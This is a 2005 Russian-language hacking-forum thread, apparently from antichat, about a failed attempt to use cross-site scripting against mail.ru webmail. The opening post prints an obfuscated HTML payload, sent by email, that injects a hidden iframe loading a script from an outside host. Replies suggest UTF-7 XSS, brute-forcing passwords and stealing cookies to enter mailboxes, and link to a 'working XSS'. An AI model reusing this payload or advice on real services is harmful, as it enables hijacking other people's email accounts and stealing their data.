проблема с mail.ru

Discussion in 'Песочница' started by unhappy, 19 Jun 2005.

  1. unhappy

    unhappy New Member

    Joined:
    24 Feb 2004
    Messages:
    9
    Likes Received:
    0
    Reputations:
    0
    сделал все как написано в вашей статье, себе на сайт залил файл с формой, а на нужный мыльник отправил
    HTML:
    <embed src="&#106&#97&#118&#97&#115&#99&#114&#105&#112&#116&#58status=location;document.getElementById('xxx').innerHTML='<&#105&#102&#114&#97&#109&#101 src=http://yoursite.ru/yourscript.html width=0 height=0></&#105&#102&#114&#97&#109&#101>';this.wav" width=0 height=0> <p id='xxx'>
    мыльник который хочу сломать - мой =) т.е. я знаю от него пароль, просто на своём эксперементирую =) когда я открыл тот ящик куда пришел выше указанный код, я заметил, что, по идее хтмл кода-то не должно быть видно, а он походу отфильтровывается теперь...т.е. код отосланный мной, его видно в письме, и он, естессно, не пашет...
    зы: вначале письмо в хтмл формате (не аттачем)...
    вот...че такое?
     
  2. Майор

    Майор Active Member

    Joined:
    24 Oct 2004
    Messages:
    558
    Likes Received:
    112
    Reputations:
    146
    там поставили новые фильтры
    теперь c наличием xss - там проблема
     
  3. DRON-ANARCHY

    DRON-ANARCHY Отец порядка

    Joined:
    4 Mar 2005
    Messages:
    713
    Likes Received:
    142
    Reputations:
    50
    Мдя...Mail.ru обновился....
     
  4. unhappy

    unhappy New Member

    Joined:
    24 Feb 2004
    Messages:
    9
    Likes Received:
    0
    Reputations:
    0
    *** и чего...теперь там дыр нету? как еще можно ломануть? =)
    зы: социнженерью не предлагать...

    from moderator : не матерись
     
    #4 unhappy, 19 Jun 2005
    Last edited by a moderator: 19 Jun 2005
  5. Майор

    Майор Active Member

    Joined:
    24 Oct 2004
    Messages:
    558
    Likes Received:
    112
    Reputations:
    146
    Почитайте "Использование UTF-7 в атаках класса XSS"
     
    #5 Майор, 19 Jun 2005
    Last edited: 19 Jun 2005
  6. GreenBear

    GreenBear наркоман с медалью

    Joined:
    7 May 2005
    Messages:
    2,547
    Likes Received:
    1,398
    Reputations:
    612
    раз не СИ, так брут -)
     
  7. JazzzSummerMan

    Joined:
    7 Apr 2004
    Messages:
    374
    Likes Received:
    18
    Reputations:
    14
    найти XSS еще не значит ломануть. С её помощью там ничего не сделаешь, только настроишь пересылку, что весьма затруднительно реализовать. Ну или просто зайдешь в ящик, похитив куки.
    А пример рабочей XSS вот здесь можно найти
    http://forum.antichat.ru/showthread.php?p=46400#post46400&conly=
     
  8. Майор

    Майор Active Member

    Joined:
    24 Oct 2004
    Messages:
    558
    Likes Received:
    112
    Reputations:
    146
    уже не пашет
     
Loading...